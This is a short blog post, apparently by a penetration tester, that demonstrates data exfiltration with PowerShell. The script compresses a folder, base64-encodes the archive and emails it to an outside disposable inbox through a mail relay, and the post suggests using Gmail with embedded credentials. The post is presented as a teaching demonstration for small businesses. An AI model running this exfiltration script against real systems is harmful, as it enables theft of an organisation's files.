PowerShell Data Exfil

In my talk at BSides,I brought up "attacker motivation" and I gave some possible factors such as:  political, financial, revenge, etc.  Hacking isn't necessarily for the sake of just hacking and there could be some sort of underlying motivation.  It could be that an attacker is attempting to steal data.  And in the context of showing small businesses the impact of a breach, I want to lean more towards showing the simplicity of an attack which was the point of the talk and this post.  In my talk, I didn't go through data exfiltration but I'm giving another talk this week and I will go through it with them.

In a penetration test, I want to show how I breach the perimeter, the steps for enumeration on the network from that initial foothold, how I move laterally, how I take over the domain, and how I can steal data.  This method specifically for stealing data might not scale well but it's effective up to about 25mb.  That would be plenty for a small set of financial or HR documents.  Definitely enough to prove your point.

For this proof of concept, we have a folder with a couple of files and a sub folder with another couple of files:


The first line archives the files and folders into a zip file titled:  "Archive".  It will automatically append .zip to the end of the file.  In the next statement, we're going to convert everything to base64.  In the final statement, we're emailing the base64 encoded documents in the body of a message. 

I have a mail relay setup to accept inbound messages from my victim network.  You could send this to Gmail and bake in credentials. 



Compress-Archive -Path C:\ArchiveMe -DestinationPath C:\Temp\Archive

$FileName = "c:\Temp\Archive.zip"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName))

Send-MailMessage -From 'Attacker <attacker@example.com>' `
  -To 'test <acbc1234@sharklasers.com>' -Subject 'Data Exfil' `
  -Body $base64string -Priority High -SmtpServer 'outbound.example.com'

When we execute our code, we don't see any errors -- so far so good...


Moments later, we see an inbound email to Shark Lasers which is where I sent my message:


When we open our message, we see our base64 encoded string:


We copy it out, echo it into a file, check the file to make sure it's a zip archive, and finally, we extract it:


Pretty simple and very effective for small amounts of data.